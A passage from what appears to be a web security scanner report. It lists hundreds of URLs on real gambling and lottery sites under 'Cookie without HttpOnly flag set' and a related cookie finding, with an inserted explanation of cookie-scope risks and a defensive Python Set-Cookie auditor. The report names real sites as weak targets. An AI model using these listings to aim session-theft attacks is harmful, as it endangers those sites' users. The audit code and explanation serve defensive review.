11.73. http://sv.bigmoneyscratch.com/Home.aspx

11.74. http://sv.karamba.com/Home.aspx

11.75. http://sv.scratch2cash.com/Home.aspx

11.76. http://sv.scratchcardheaven.com/Home.aspx

11.77. http://va.px.invitemedia.com/goog_imp

11.78. http://winter.metacafe.com/Openx/www/delivery/lg.php

11.79. http://www.bigmoneyscratch.com/

11.80. http://www.bigmoneyscratch.com/AboutUs.aspx

11.81. http://www.bigmoneyscratch.com/Affiliates.aspx

11.82. http://www.bigmoneyscratch.com/ContactUsChat.aspx

11.83. http://www.bigmoneyscratch.com/ContactUsFax.aspx

11.84. http://www.bigmoneyscratch.com/ContactUsMail.aspx

11.85. http://www.bigmoneyscratch.com/ContactUsTel.aspx

11.86. http://www.bigmoneyscratch.com/FAQ.aspx

11.87. http://www.bigmoneyscratch.com/FairPlay.aspx

11.88. http://www.bigmoneyscratch.com/Help.aspx

11.89. http://www.bigmoneyscratch.com/Home.aspx

11.90. http://www.bigmoneyscratch.com/InviteFriend.aspx

11.91. http://www.bigmoneyscratch.com/Mobile.aspx

11.92. http://www.bigmoneyscratch.com/PlayersClub.aspx

11.93. http://www.bigmoneyscratch.com/Promotions.aspx

11.94. http://www.bigmoneyscratch.com/Responsible.aspx

11.95. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx

11.96. http://www.bigmoneyscratch.com/Terms.aspx

11.97. http://www.bigmoneyscratch.com/UnderAge.aspx

11.98. http://www.facebook.com/

11.99. http://www.facebook.com/PrimeScratchCards

11.100. http://www.facebook.com/WinningsCom

11.101. http://www.facebook.com/crazyscratch

11.102. http://www.facebook.com/pages/BigMoneyScratch/156518521055171

11.103. http://www.facebook.com/pages/PrimeScratchCards/122783514413813

11.104. http://www.facebook.com/peoplespostcodelottery

11.105. http://www.hopa.com/

11.106. http://www.hopa.com/visit.aspx

11.107. http://www.info.crazyscratch.com/AboutUs.aspx

11.108. http://www.info.crazyscratch.com/ContactUsFax.aspx

11.109. http://www.info.crazyscratch.com/ContactUsMail.aspx

11.110. http://www.info.crazyscratch.com/ContactUsTel.aspx

11.111. http://www.info.crazyscratch.com/FairPlay.aspx

11.112. http://www.info.crazyscratch.com/Help.aspx

11.113. http://www.info.crazyscratch.com/InviteFriend.aspx

11.114. http://www.info.crazyscratch.com/PlayersClub.aspx

11.115. http://www.info.crazyscratch.com/Privacy.aspx

11.116. http://www.info.crazyscratch.com/Promotions.aspx

11.117. http://www.info.crazyscratch.com/Responsible.aspx

11.118. http://www.info.crazyscratch.com/Terms.aspx

11.119. http://www.info.crazyscratch.com/UnderAge.aspx

11.120. http://www.info.crazyscratch.com/visit.aspx

11.121. http://www.info.winnings.com/visit.aspx

11.122. http://www.karamba.com/

11.123. http://www.karamba.com/AboutUs.aspx

11.124. http://www.karamba.com/FairPlay.aspx

11.125. http://www.karamba.com/Help.aspx

11.126. http://www.karamba.com/Home.aspx

11.127. http://www.karamba.com/InviteFriend.aspx

11.128. http://www.karamba.com/PlayersClub.aspx

11.129. http://www.karamba.com/Privacy.aspx

11.130. http://www.karamba.com/Promotions.aspx

11.131. http://www.karamba.com/Responsible.aspx

11.132. http://www.karamba.com/Sitemap.aspx

11.133. http://www.karamba.com/Terms.aspx

11.134. http://www.karamba.com/UnderAge.aspx

11.135. http://www.karamba.com/click/Karamba.com/ENG/Home/

11.136. http://www.mundirasca.com/

11.137. http://www.mundirasca.com/AboutUs.aspx

11.138. http://www.mundirasca.com/ContactUsChat.aspx

11.139. http://www.mundirasca.com/ContactUsFax.aspx

11.140. http://www.mundirasca.com/ContactUsMail.aspx

11.141. http://www.mundirasca.com/ContactUsTel.aspx

11.142. http://www.mundirasca.com/FAQ.aspx

11.143. http://www.mundirasca.com/FairPlay.aspx

11.144. http://www.mundirasca.com/Help.aspx

11.145. http://www.mundirasca.com/Home.aspx

11.146. http://www.mundirasca.com/InviteFriend.aspx

11.147. http://www.mundirasca.com/PlayersClub.aspx

11.148. http://www.mundirasca.com/Promotions.aspx

11.149. http://www.mundirasca.com/Responsible.aspx

11.150. http://www.mundirasca.com/SecurityAndPrivacy.aspx

11.151. http://www.mundirasca.com/Terms.aspx

11.152. http://www.mundirasca.com/UnderAge.aspx

11.153. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/

11.154. http://www.pclscratch.com/ContactUsMail.aspx

11.155. http://www.pclscratch.com/FairPlay.aspx

11.156. http://www.pclscratch.com/Promotions.aspx

11.157. http://www.pclscratch.com/Responsible.aspx

11.158. http://www.pclscratch.com/SecurityAndPrivacy.aspx

11.159. http://www.pclscratch.com/Terms.aspx

11.160. http://www.postcodelottery.com/AboutUs.htm

11.161. http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm

11.162. http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm

11.163. http://www.postcodelottery.com/Charities.htm

11.164. http://www.postcodelottery.com/DrawResults.htm

11.165. http://www.postcodelottery.com/FunGames.htm

11.166. http://www.postcodelottery.com/FunGames/FreeGames.htm

11.167. http://www.postcodelottery.com/FunGames/PaidGames.htm

11.168. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm

11.169. http://www.postcodelottery.com/FunGames/PostcodeChallenge.htm

11.170. http://www.postcodelottery.com/Games/Scratchcards.htm

11.171. http://www.postcodelottery.com/Home.htm

11.172. http://www.postcodelottery.com/HowItWorks.htm

11.173. http://www.postcodelottery.com/MyAccount.htm

11.174. http://www.postcodelottery.com/RSS.htm

11.175. http://www.postcodelottery.com/Sitemap.htm

11.176. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm

11.177. http://www.primegrattage.com/

11.178. http://www.primescratchcards.com/

11.179. http://www.primescratchcards.com/HelpDepositMethods.asp

11.180. http://www.primescratchcards.com/InviteFriend.asp

11.181. http://www.primescratchcards.com/Responsible.asp

11.182. http://www.primescratchcards.com/SecurityAndPrivacy.asp

11.183. http://www.primescratchcards.com/aboutus.asp

11.184. http://www.primescratchcards.com/affiliates.asp

11.185. http://www.primescratchcards.com/contactus.asp

11.186. http://www.primescratchcards.com/fairplay.asp

11.187. http://www.primescratchcards.com/help.asp

11.188. http://www.primescratchcards.com/index.asp

11.189. http://www.primescratchcards.com/media.asp

11.190. http://www.primescratchcards.com/playersclub.asp

11.191. http://www.primescratchcards.com/promotions.asp

11.192. http://www.primescratchcards.com/terms.asp

11.193. http://www.primescratchcards.com/underage.asp

11.194. http://www.primescratchcards.com.br/

11.195. http://www.scratch2cash.com/

11.196. http://www.scratch2cash.com/AboutUs.aspx

11.197. http://www.scratch2cash.com/ContactUsMail.aspx

11.198. http://www.scratch2cash.com/FairPlay.aspx

11.199. http://www.scratch2cash.com/Help.aspx

11.200. http://www.scratch2cash.com/Home.aspx

11.201. http://www.scratch2cash.com/InviteFriend.aspx

11.202. http://www.scratch2cash.com/PlayersClub.aspx

11.203. http://www.scratch2cash.com/Promotions.aspx

11.204. http://www.scratch2cash.com/Responsible.aspx

11.205. http://www.scratch2cash.com/SecurityAndPrivacy.aspx

11.206. http://www.scratch2cash.com/Sitemap.aspx

11.207. http://www.scratch2cash.com/Terms.aspx

11.208. http://www.scratch2cash.com/UnderAge.aspx

11.209. http://www.scratchcardheaven.com/

11.210. http://www.scratchcardheaven.com/AboutUs.aspx

11.211. http://www.scratchcardheaven.com/ContactUsMail.aspx

11.212. http://www.scratchcardheaven.com/FairPlay.aspx

11.213. http://www.scratchcardheaven.com/Help.aspx

11.214. http://www.scratchcardheaven.com/Home.aspx

11.215. http://www.scratchcardheaven.com/InviteFriend.aspx

11.216. http://www.scratchcardheaven.com/PlayersClub.aspx

11.217. http://www.scratchcardheaven.com/Promotions.aspx

11.218. http://www.scratchcardheaven.com/Responsible.aspx

11.219. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx

11.220. http://www.scratchcardheaven.com/Terms.aspx

11.221. http://www.scratchcardheaven.com/UnderAge.aspx

11.222. http://www.svenskalotter.com/

11.223. http://www.svenskalotter.com/AboutUs.aspx

11.224. http://www.svenskalotter.com/Affiliates.aspx

11.225. http://www.svenskalotter.com/Charity.aspx

11.226. http://www.svenskalotter.com/ContactUsMail.aspx

11.227. http://www.svenskalotter.com/FairPlay.aspx

11.228. http://www.svenskalotter.com/Help.aspx

11.229. http://www.svenskalotter.com/Home.aspx

11.230. http://www.svenskalotter.com/InviteFriend.aspx

11.231. http://www.svenskalotter.com/PlayersClub.aspx

11.232. http://www.svenskalotter.com/Promotions.aspx

11.233. http://www.svenskalotter.com/Responsible.aspx

11.234. http://www.svenskalotter.com/SecurityAndPrivacy.aspx

11.235. http://www.svenskalotter.com/Terms.aspx

11.236. http://www.svenskalotter.com/UnderAge.aspx

11.237. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/

11.238. http://www.thawte.com/

11.239. https://www.thawte.com/

11.240. http://www.verisign.co.uk/

11.241. http://www.youtube.com/user/CrazyScratchCom

11.242. http://www.youtube.com/user/PostcodeLottery

11.243. http://www.youtube.com/user/primescratchcards1

11.244. http://www.youtube.com/v/
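
Sections 7 and 11, and the HttpOnly section that follows, are three views of the same Set-Cookie header: a cookie issued over TLS without the Secure flag is also sent on any http:// request to the host; a cookie whose Domain attribute names a parent of the issuing host is sent to every sibling subdomain (one compromised or attacker-controlled subdomain then receives it); and a cookie without HttpOnly can be read by script, which turns any of the reflected XSS findings earlier in this report into session theft. The Python below is an added example, not the report's own code, that applies all three checks to a Set-Cookie header given the request host and scheme. The headers it audits are constructed samples for the made-up host www.example.com.

```python
"""Audit Set-Cookie headers for the Secure, HttpOnly and Domain-scope weaknesses.

Added example; the sample headers are constructed, not captured from any host.
"""


def parse_set_cookie(header: str) -> tuple[str, str, dict[str, str]]:
    """Split one Set-Cookie header into (name, value, {attribute: value}).

    Attribute names are lower-cased; flag attributes such as Secure and HttpOnly
    map to an empty string so presence can be tested with `in`.
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: dict[str, str] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header: str, request_host: str, over_https: bool) -> list[str]:
    """Return the findings for one Set-Cookie header.

    request_host is the host the response came from; over_https says whether the
    response was received on a TLS connection (the Secure check only applies then).
    """
    name, _, attrs = parse_set_cookie(header)
    host = request_host.lower()
    findings = []
    if over_https and "secure" not in attrs:
        findings.append(f"{name}: SSL cookie without secure flag set "
                        f"(will also be sent on http://{host}/ requests)")
    if "httponly" not in attrs:
        findings.append(f"{name}: cookie without HttpOnly flag set "
                        "(readable by script, e.g. via a reflected XSS on the site)")
    # A Domain attribute naming a parent of the issuing host widens the cookie's scope
    # to every subdomain of that parent. A leading dot is ignored by modern browsers.
    domain = attrs.get("domain", "").lstrip(".").lower()
    if domain and domain != host and host.endswith("." + domain):
        findings.append(f"{name}: cookie scoped to parent domain {domain} "
                        f"(sent to every host under {domain}, not only {host})")
    return findings


def audit_response(set_cookie_headers: list[str], request_host: str,
                   over_https: bool) -> list[str]:
    """Run audit_set_cookie over every Set-Cookie header of one response."""
    findings = []
    for header in set_cookie_headers:
        findings.extend(audit_set_cookie(header, request_host, over_https))
    return findings


# Constructed sample headers, as if received from https://www.example.com/.
SAMPLE_HEADERS = [
    "session=q2zj4m45n1s3; path=/",
    "tracking=1; domain=.example.com; path=/",
    "pref=en; Domain=www.example.com; Path=/; Secure; HttpOnly; SameSite=Lax",
]

if __name__ == "__main__":
    for line in audit_response(SAMPLE_HEADERS, "www.example.com", over_https=True):
        print(line)
```

The first sample cookie is missing both flags; the second additionally leaks to every subdomain of example.com; the third passes because its Domain equals the issuing host and both flags are present. The parent-domain finding is only a weakness when some subdomain is less trusted than the issuer, so treat it as something to confirm against the site's actual host layout rather than as an automatic defect.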

12. Cookie without HttpOnly flag set

12.1. http://bingo.bet365.com/play/en/home/

12.2. http://blog.primescratchcards.co.uk/

12.3. http://br.winnings.com/

12.4. http://casino.bet365.com/en/

12.5. http://casino.bet365.com/extra/en/online-games/baccarat

12.6. http://casino.bet365.com/extra/en/online-games/blackjack

12.7. http://casino.bet365.com/extra/en/online-games/live-dealer

12.8. http://casino.bet365.com/extra/en/online-games/roulette

12.9. http://casino.bet365.com/home/en/

12.10. http://da.crazyscratch.com/

12.11. http://da.winnings.com/

12.12. http://de.crazyscratch.com/

12.13. http://de.winnings.com/

12.14. http://el.crazyscratch.com/

12.15. http://el.winnings.com/

12.16. http://en.crazyscratch.com/

12.17. http://es.crazyscratch.com/

12.18. http://es.winnings.com/

12.19. http://fi.crazyscratch.com/

12.20. http://fi.winnings.com/

12.21. http://fr.crazyscratch.com/

12.22. http://fr.winnings.com/

12.23. http://games.bet365.com/en/scratchcards/

12.24. http://games.bet365.com/home/en/

12.25. http://getclicky.com/66384109

12.26. https://help.betsson.com/display/4/kb/faq/index.aspx

12.27. http://hu.crazyscratch.com/

12.28. http://it.crazyscratch.com/

12.29. http://mad4milk.net/

12.30. https://members.bet365.com/members/chat/

12.31. http://nl.crazyscratch.com/

12.32. http://nl.winnings.com/

12.33. http://no.crazyscratch.com/

12.34. http://no.winnings.com/

12.35. http://poker.bet365.com/en/

12.36. http://poker.bet365.com/home/en/

12.37. http://primescratchcards.com/images/bg.jpg

12.38. http://pt.crazyscratch.com/

12.39. http://pt.winnings.com/

12.40. http://scratch.co.uk/

12.41. http://scratch.co.uk/promotions/argos/

12.42. http://solutions.liveperson.com/ref/lppb.asp

12.43. http://sv.crazyscratch.com/

12.44. http://sv.winnings.com/

12.45. http://trk.primescratchcards.com/

12.46. http://winnings.com/xmlrpc.php

12.47. http://www.bet365.com/

12.48. http://www.bet365.com/bg/

12.49. http://www.bet365.com/cs/

12.50. http://www.bet365.com/da/

12.51. http://www.bet365.com/de/

12.52. http://www.bet365.com/el/

12.53. http://www.bet365.com/en/

12.54. http://www.bet365.com/en/default.asp

12.55. http://www.bet365.com/es/

12.56. http://www.bet365.com/home/iface.asp

12.57. http://www.bet365.com/hu/

12.58. http://www.bet365.com/it/

12.59. http://www.bet365.com/nn/

12.60. http://www.bet365.com/pl/

12.61. http://www.bet365.com/pt/

12.62. http://www.bet365.com/ro/

12.63. http://www.bet365.com/sk/

12.64. http://www.bet365.com/sv/

12.65. http://www.bet365.com/zh-CHS/

12.66. http://www.bet365.com/zh-CHT/

12.67. https://www.betsson.com/en/about/

12.68. https://www.betsson.com/en/about/company-information/payments-and-security/index.asp

12.69. https://www.betsson.com/en/customer-service/

12.70. https://www.betsson.com/en/customer-service/forgotten-password/

12.71. https://www.betsson.com/en/customer-service/privacy-statement/

12.72. https://www.betsson.com/en/customer-service/responsible-gaming/

12.73. https://www.betsson.com/en/customer-service/terms/index.asp

12.74. https://www.betsson.com/en/my-account/refer-a-friend/index.asp

12.75. https://www.betsson.com/my-account/refer-a-friend/index.asp

12.76. http://www.crazyscratch.com/

12.77. http://www.egba.eu/

12.78. http://www.lga.org.mt/lga/content.aspx

12.79. http://www.lga.org.mt/lga/home.aspx

12.80. http://www.metacafe.com/fplayer/

12.81. http://www.national-lottery.co.uk/player/p/help/scratchcard.ftl

12.82. http://www.opensource.org/licenses/mit-license.php

12.83. http://www.paysafecard.com/

12.84. http://www.primegaming.com/

12.85. http://www.primegrattage.com/

12.86. http://www.primescratchcards.com/

12.87. http://www.primescratchcards.com/index.asp

12.88. http://www.primescratchcards.com.br/

12.89. http://www.vincite.net/

12.90. http://www.winnings.com/

12.91. http://www.winnings.com/xmlrpc.php

12.92. http://ad.yieldmanager.com/imp

12.93. http://ad.yieldmanager.com/pixel

12.94. http://affiliates.interwetten.com/

12.95. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json

12.96. http://b.scorecardresearch.com/b

12.97. http://bid.openx.net/json

12.98. http://br.bigmoneyscratch.com/Home.aspx

12.99. http://br.karamba.com/Home.aspx

12.100. http://d.tradex.openx.com/afr.php

12.101. http://d.tradex.openx.com/lg.php

12.102. http://da.bigmoneyscratch.com/Home.aspx

12.103. http://da.karamba.com/Home.aspx

12.104. http://da.scratch2cash.com/Home.aspx

12.105. http://da.scratchcardheaven.com/Home.aspx

12.106. http://de.bigmoneyscratch.com/Home.aspx

12.107. http://de.karamba.com/Home.aspx

12.108. http://de.scratch2cash.com/Home.aspx

12.109. http://de.scratchcardheaven.com/Home.aspx

12.110. http://el.karamba.com/Home.aspx

12.111. http://es.bigmoneyscratch.com/Home.aspx

12.112. http://es.karamba.com/Home.aspx

12.113. http://es.scratch2cash.com/Home.aspx

12.114. http://es.scratchcardheaven.com/Home.aspx

12.115. http://fi.bigmoneyscratch.com/Home.aspx

12.116. http://fi.karamba.com/Home.aspx

12.117. http://fi.scratchcardheaven.com/Home.aspx

12.118. http://fr.bigmoneyscratch.com/Home.aspx

12.119. http://fr.karamba.com/Home.aspx

12.120. http://fr.scratch2cash.com/Home.aspx

12.121. http://fr.scratchcardheaven.com/Home.aspx

12.122. http://home.okscratchcards.com/AboutUs.aspx

12.123. http://home.okscratchcards.com/ContactUsMail.aspx

12.124. http://home.okscratchcards.com/FairPlay.aspx

12.125. http://home.okscratchcards.com/PlayersClub.aspx

12.126. http://home.okscratchcards.com/Promotions.aspx

12.127. http://home.okscratchcards.com/Responsible.aspx

12.128. http://home.okscratchcards.com/SecurityAndPrivacy.aspx

12.129. http://home.okscratchcards.com/Terms.aspx

12.130. http://home.okscratchcards.com/help.aspx

12.131. http://home.okscratchcards.com/visit.aspx

12.132. http://it.bigmoneyscratch.com/Home.aspx

12.133. http://it.karamba.com/Home.aspx

12.134. http://it.scratch2cash.com/Home.aspx

12.135. http://it.scratchcardheaven.com/Home.aspx

12.136. http://m.xp1.ru4.com/ad

12.137. http://nettiarpa.com/

12.138. http://nl.bigmoneyscratch.com/Home.aspx

12.139. http://nl.karamba.com/Home.aspx

12.140. http://nl.scratch2cash.com/Home.aspx

12.141. http://nl.scratchcardheaven.com/Home.aspx

12.142. http://no.bigmoneyscratch.com/Home.aspx

12.143. http://no.karamba.com/Home.aspx

12.144. http://no.scratchcardheaven.com/Home.aspx

12.145. http://pixel.invitemedia.com/data_sync

12.146. http://pixel.quantserve.com/pixel

12.147. http://pixel.quantserve.com/pixel/p-96ifrWFBpTdiA.gif

12.148. http://primescratchcards.com/images/HelpDepositMethods.asp

12.149. http://primescratchcards.com/images/InviteFriend.asp

12.150. http://primescratchcards.com/images/Responsible.asp

12.151. http://primescratchcards.com/images/SecurityAndPrivacy.asp

12.152. http://primescratchcards.com/images/aboutus.asp

12.153. http://primescratchcards.com/images/affiliates.asp

12.154. http://primescratchcards.com/images/contactus.asp

12.155. http://primescratchcards.com/images/fairplay.asp

12.156. http://primescratchcards.com/images/help.asp

12.157. http://primescratchcards.com/images/index.asp

12.158. http://primescratchcards.com/images/media.asp

12.159. http://primescratchcards.com/images/playersclub.asp

12.160. http://primescratchcards.com/images/promotions.asp

12.161. http://primescratchcards.com/images/terms.asp

12.162. http://primescratchcards.com/images/underage.asp

12.163. http://pt.bigmoneyscratch.com/Home.aspx

12.164. http://pt.karamba.com/Home.aspx

12.165. http://pt.scratch2cash.com/Home.aspx

12.166. http://pt.scratchcardheaven.com/Home.aspx

12.167. http://scratch.co.uk/

12.168. http://scratch.co.uk/about/

12.169. http://scratch.co.uk/contact/

12.170. http://scratch.co.uk/help/

12.171. http://scratch.co.uk/help/deposit/methods/

12.172. http://scratch.co.uk/help/fairplay/

12.173. http://scratch.co.uk/help/privacy/

12.174. http://scratch.co.uk/invite-friend/

12.175. http://scratch.co.uk/over-18/

12.176. http://scratch.co.uk/problem-gambling/

12.177. http://scratch.co.uk/promotions/

12.178. http://scratch.co.uk/terms/

12.179. http://scratch.co.uk/vis-club/

12.180. http://scratch.co.uk/winners/

12.181. http://server.iad.liveperson.net/hc/15712222/

12.182. http://server.iad.liveperson.net/hc/15712222/

12.183. http://server.iad.liveperson.net/hc/15712222/

12.184. http://sv.bigmoneyscratch.com/Home.aspx

12.185. http://sv.karamba.com/Home.aspx

12.186. http://sv.scratch2cash.com/Home.aspx

12.187. http://sv.scratchcardheaven.com/Home.aspx

12.188. http://twitter.com/PostcodeLottery

12.189. http://twitter.com/PrimeScratch

12.190. http://twitter.com/crazyscratch

12.191. http://twitter.com/ukscratch

12.192. http://va.px.invitemedia.com/goog_imp

12.193. http://winter.metacafe.com/Openx/www/delivery/lg.php

12.194. http://www.bet365.com/extra/en/betting/in-play

12.195. http://www.bet365.com/extra/en/betting/live-streaming

12.196. http://www.bet365.com/extra/en/mobile/introduction/

12.197. http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed

12.198. http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back

12.199. http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus

12.200. https://www.betsson.com/core/StartPlaying/Api/StartPlayingInit.ashx

12.201. https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js

12.202. https://www.betsson.com/start/en/

12.203. https://www.betsson.com/start/is/

12.204. https://www.betsson.com/web/en/sportsbook/

12.205. http://www.bigmoneyscratch.com/

12.206. http://www.bigmoneyscratch.com/AboutUs.aspx

12.207. http://www.bigmoneyscratch.com/Affiliates.aspx

12.208. http://www.bigmoneyscratch.com/ContactUsChat.aspx

12.209. http://www.bigmoneyscratch.com/ContactUsFax.aspx

12.210. http://www.bigmoneyscratch.com/ContactUsMail.aspx

12.211. http://www.bigmoneyscratch.com/ContactUsTel.aspx

12.212. http://www.bigmoneyscratch.com/FAQ.aspx

12.213. http://www.bigmoneyscratch.com/FairPlay.aspx

12.214. http://www.bigmoneyscratch.com/Help.aspx

12.215. http://www.bigmoneyscratch.com/Home.aspx

12.216. http://www.bigmoneyscratch.com/InviteFriend.aspx

12.217. http://www.bigmoneyscratch.com/Mobile.aspx

12.218. http://www.bigmoneyscratch.com/PlayersClub.aspx

12.219. http://www.bigmoneyscratch.com/Promotions.aspx

12.220. http://www.bigmoneyscratch.com/Responsible.aspx

12.221. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx

12.222. http://www.bigmoneyscratch.com/Terms.aspx

12.223. http://www.bigmoneyscratch.com/UnderAge.aspx

12.224. http://www.facebook.com/

12.225. http://www.facebook.com/PrimeScratchCards

12.226. http://www.facebook.com/WinningsCom

12.227. http://www.facebook.com/crazyscratch

12.228. http://www.facebook.com/pages/BigMoneyScratch/156518521055171

12.229. http://www.facebook.com/pages/PrimeScratchCards/122783514413813

12.230. http://www.facebook.com/peoplespostcodelottery

12.231. http://www.gambleaware.co.uk/

12.232. http://www.gamblersanonymous.org.uk/

12.233. http://www.hopa.com/

12.234. http://www.hopa.com/visit.aspx

12.235. http://www.info.crazyscratch.com/AboutUs.aspx

12.236. http://www.info.crazyscratch.com/ContactUsFax.aspx

12.237. http://www.info.crazyscratch.com/ContactUsMail.aspx

12.238. http://www.info.crazyscratch.com/ContactUsTel.aspx

12.239. http://www.info.crazyscratch.com/FairPlay.aspx

12.240. http://www.info.crazyscratch.com/Help.aspx

12.241. http://www.info.crazyscratch.com/InviteFriend.aspx

12.242. http://www.info.crazyscratch.com/PlayersClub.aspx

12.243. http://www.info.crazyscratch.com/Privacy.aspx

12.244. http://www.info.crazyscratch.com/Promotions.aspx

12.245. http://www.info.crazyscratch.com/Responsible.aspx

12.246. http://www.info.crazyscratch.com/Terms.aspx

12.247. http://www.info.crazyscratch.com/UnderAge.aspx

12.248. http://www.info.crazyscratch.com/visit.aspx

12.249. http://www.info.winnings.com/visit.aspx

12.250. https://www.interwetten.com/

12.251. http://www.karamba.com/

12.252. http://www.karamba.com/AboutUs.aspx

12.253. http://www.karamba.com/FairPlay.aspx

12.254. http://www.karamba.com/Help.aspx

12.255. http://www.karamba.com/Home.aspx

12.256. http://www.karamba.com/InviteFriend.aspx

12.257. http://www.karamba.com/PlayersClub.aspx

12.258. http://www.karamba.com/Privacy.aspx

12.259. http://www.karamba.com/Promotions.aspx

12.260. http://www.karamba.com/Responsible.aspx

12.261. http://www.karamba.com/Sitemap.aspx

12.262. http://www.karamba.com/Terms.aspx

12.263. http://www.karamba.com/UnderAge.aspx

12.264. http://www.karamba.com/click/Karamba.com/ENG/Home/

12.265. http://www.mundirasca.com/

12.266. http://www.mundirasca.com/AboutUs.aspx

12.267. http://www.mundirasca.com/ContactUsChat.aspx

12.268. http://www.mundirasca.com/ContactUsFax.aspx

12.269. http://www.mundirasca.com/ContactUsMail.aspx

12.270. http://www.mundirasca.com/ContactUsTel.aspx

12.271. http://www.mundirasca.com/FAQ.aspx

12.272. http://www.mundirasca.com/FairPlay.aspx

12.273. http://www.mundirasca.com/Help.aspx

12.274. http://www.mundirasca.com/Home.aspx

12.275. http://www.mundirasca.com/InviteFriend.aspx

12.276. http://www.mundirasca.com/PlayersClub.aspx

12.277. http://www.mundirasca.com/Promotions.aspx

12.278. http://www.mundirasca.com/Responsible.aspx

12.279. http://www.mundirasca.com/SecurityAndPrivacy.aspx

12.280. http://www.mundirasca.com/Terms.aspx

12.281. http://www.mundirasca.com/UnderAge.aspx

12.282. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/

12.283. http://www.neteller.com/

12.284. http://www.pclscratch.com/ContactUsMail.aspx

12.285. http://www.pclscratch.com/FairPlay.aspx

12.286. http://www.pclscratch.com/Promotions.aspx

12.287. http://www.pclscratch.com/Responsible.aspx

12.288. http://www.pclscratch.com/SecurityAndPrivacy.aspx

12.289. http://www.pclscratch.com/Terms.aspx

12.290. http://www.postcodelottery.com/AboutUs.htm

12.291. http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm

12.292. http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm

12.293. http://www.postcodelottery.com/Charities.htm

12.294. http://www.postcodelottery.com/DrawResults.htm

12.295. http://www.postcodelottery.com/FunGames.htm

12.296. http://www.postcodelottery.com/FunGames/FreeGames.htm

12.297. http://www.postcodelottery.com/FunGames/PaidGames.htm

12.298. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm

12.299. http://www.postcodelottery.com/FunGames/PostcodeChallenge.htm

12.300. http://www.postcodelottery.com/Games/Scratchcards.htm

12.301. http://www.postcodelottery.com/Home.htm

12.302. http://www.postcodelottery.com/HowItWorks.htm

12.303. http://www.postcodelottery.com/MyAccount.htm

12.304. http://www.postcodelottery.com/RSS.htm

12.305. http://www.postcodelottery.com/Sitemap.htm

12.306. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm

12.307. http://www.primescratchcards.com/HelpDepositMethods.asp

12.308. http://www.primescratchcards.com/InviteFriend.asp

12.309. http://www.primescratchcards.com/Responsible.asp

12.310. http://www.primescratchcards.com/SecurityAndPrivacy.asp

12.311. http://www.primescratchcards.com/aboutus.asp

12.312. http://www.primescratchcards.com/affiliates.asp

12.313. http://www.primescratchcards.com/contactus.asp

12.314. http://www.primescratchcards.com/fairplay.asp

12.315. http://www.primescratchcards.com/help.asp

12.316. http://www.primescratchcards.com/media.asp

12.317. http://www.primescratchcards.com/playersclub.asp

12.318. http://www.primescratchcards.com/promotions.asp

12.319. http://www.primescratchcards.com/terms.asp

12.320. http://www.primescratchcards.com/underage.asp

12.321. http://www.scratch2cash.com/

12.322. http://www.scratch2cash.com/AboutUs.aspx

12.323. http://www.scratch2cash.com/ContactUsMail.aspx

12.324. http://www.scratch2cash.com/FairPlay.aspx

12.325. http://www.scratch2cash.com/Help.aspx

12.326. http://www.scratch2cash.com/Home.aspx

12.327. http://www.scratch2cash.com/InviteFriend.aspx

12.328. http://www.scratch2cash.com/PlayersClub.aspx

12.329. http://www.scratch2cash.com/Promotions.aspx

12.330. http://www.scratch2cash.com/Responsible.aspx

12.331. http://www.scratch2cash.com/SecurityAndPrivacy.aspx

12.332. http://www.scratch2cash.com/Sitemap.aspx

12.333. http://www.scratch2cash.com/Terms.aspx

12.334. http://www.scratch2cash.com/UnderAge.aspx

12.335. http://www.scratchcardheaven.com/

12.336. http://www.scratchcardheaven.com/AboutUs.aspx

12.337. http://www.scratchcardheaven.com/ContactUsMail.aspx

12.338. http://www.scratchcardheaven.com/FairPlay.aspx

12.339. http://www.scratchcardheaven.com/Help.aspx

12.340. http://www.scratchcardheaven.com/Home.aspx

12.341. http://www.scratchcardheaven.com/InviteFriend.aspx

12.342. http://www.scratchcardheaven.com/PlayersClub.aspx

12.343. http://www.scratchcardheaven.com/Promotions.aspx

12.344. http://www.scratchcardheaven.com/Responsible.aspx

12.345. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx

12.346. http://www.scratchcardheaven.com/Terms.aspx

12.347. http://www.scratchcardheaven.com/UnderAge.aspx

12.348. http://www.svenskalotter.com/

12.349. http://www.svenskalotter.com/AboutUs.aspx

12.350. http://www.svenskalotter.com/Affiliates.aspx

12.351. http://www.svenskalotter.com/Charity.aspx

12.352. http://www.svenskalotter.com/ContactUsMail.aspx

12.353. http://www.svenskalotter.com/FairPlay.aspx

12.354. http://www.svenskalotter.com/Help.aspx

12.355. http://www.svenskalotter.com/Home.aspx

12.356. http://www.svenskalotter.com/InviteFriend.aspx

12.357. http://www.svenskalotter.com/PlayersClub.aspx

12.358. http://www.svenskalotter.com/Promotions.aspx

12.359. http://www.svenskalotter.com/Responsible.aspx

12.360. http://www.svenskalotter.com/SecurityAndPrivacy.aspx

12.361. http://www.svenskalotter.com/Terms.aspx

12.362. http://www.svenskalotter.com/UnderAge.aspx

12.363. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/

12.364. http://www.thawte.com/

12.365. https://www.thawte.com/

12.366. http://www.verisign.co.uk/

12.367. http://www.visa.co.uk/

12.368. http://www.winnings.com/comments/feed

12.369. http://www.winnings.com/feed

